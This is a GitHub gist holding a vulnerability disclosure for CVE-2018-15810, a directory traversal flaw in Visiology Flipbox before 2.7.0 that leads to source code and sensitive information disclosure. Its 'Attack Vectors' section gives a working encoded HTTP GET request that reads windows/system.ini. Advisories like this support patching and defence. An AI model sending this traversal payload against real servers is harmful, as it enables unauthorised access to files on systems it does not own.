Skip to content

Instantly share code, notes, and snippets.

@nenf nenf/CVE-2018-15810
Last active Feb 9, 2019

Embed
What would you like to do?
[Description]
Visiology Flipbox Software Suite before 2.7.0 allows directory
traversal via %5c%2e%2e%2f because it does not sanitize filename
parameters.
------------------------------------------
[Vulnerability Type]
Directory Traversal
------------------------------------------
[Vendor of Product]
Visiology
------------------------------------------
[Affected Product Code Base]
Flipbox - < 2.7
------------------------------------------
[CVE Impact Other]
Source code disclosure, sensitive information disclosure
------------------------------------------
[Attack Vectors]
An attack against this product could be to send the following HTTP request:
GET /%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fwindows%2fsystem%2eini HTTP/1.1
Host: x.x.x.x
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Reference]
http://flipbox.net/news/620/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.